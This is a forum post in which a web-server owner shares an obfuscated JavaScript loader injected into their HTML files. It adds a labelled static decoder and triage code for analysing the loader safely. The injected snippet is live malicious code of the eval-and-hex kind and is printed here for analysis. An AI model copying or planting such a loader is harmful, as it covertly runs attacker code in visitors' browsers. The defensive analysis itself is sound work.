Some Interesting Obfuscated Snippets - Security & Cryptography
One of my shared web servers was compromised and this type of shit has been added to tons of files on the server. I'll occasionally update this with new finds. No, the host does not care. They do not believe me. No, I will not be renewing my plan.
Appended to various HTML files:
Code:
<script type="text/javascript" language="javascript" > try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="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";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));</script>
So that code executes this:
Code:
function zzzfff() {
It apparently sets a cookie with the name "visited_uq" to the value 55. Does anybody have any ideas? The .com.hk URL links to a PHP script that echoes "ok". I don't see the value referenced anywhere else in this particular block, but it creates an iFrame holding the value so it would be globally accessible on the page.
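A static decoder for the loader quoted in the post above, as an added example that is not part of the original thread: it recovers the hidden script as text without ever calling eval, then flags what that text does. The sample blob is constructed (a harmless stand-in, since the real payload is elided on this page), and the names `decodeLoader` and `indicators` are hypothetical.

```javascript
// Constructed sample with the same shape as the loader in the post. The hex
// blob is a harmless stand-in that decodes to the text "visited_uq=55".
const SAMPLE = 'a="847781778273726d837f4b4343";z=[];' +
  'for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}' +
  'eval(ss["fr"+"omCharCode"].apply(ss,z));';

// Recover the hidden script as a string. The blob and the subtracted offset
// are read out of the loader text with regexes; nothing is evaluated.
function decodeLoader(src) {
  const blobs = [...src.matchAll(/["']([0-9a-fA-F]{4,})["']/g)].map(m => m[1]);
  const off = /parseInt\(.*?,\s*16\s*\)\s*-\s*(\d+)/.exec(src);
  if (blobs.length === 0 || !off) return null; // not this loader shape
  // Short quoted fragments can also look like hex, so take the longest.
  const hex = blobs.reduce((a, b) => (b.length > a.length ? b : a));
  if (hex.length % 2 !== 0) throw new Error("odd-length hex blob");
  const shift = Number(off[1]);
  let text = "";
  for (let i = 0; i < hex.length; i += 2) {
    const code = parseInt(hex.slice(i, i + 2), 16) - shift;
    if (code < 0) throw new Error("negative char code at hex offset " + i);
    text += String.fromCharCode(code);
  }
  return { shift, text };
}

// Triage the decoded text for the behaviours the post describes:
// outbound URLs, a cookie write, and iframe creation.
function indicators(text) {
  return {
    urls: text.match(/https?:\/\/[^\s"'<>)]+/g) || [],
    setsCookie: /document\.cookie\s*=/.test(text),
    makesIframe: /iframe/i.test(text),
  };
}

console.log(decodeLoader(SAMPLE));
```

Run it with Node against a copy of the infected file's script block; the decoded text can then be grepped across the web root to find every file carrying the same injection.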
Yeah, it's definitely malicious. When I remove them, new ones are added, usually basically the same. They always lead to really bizarre websites which I assume are decoys or something...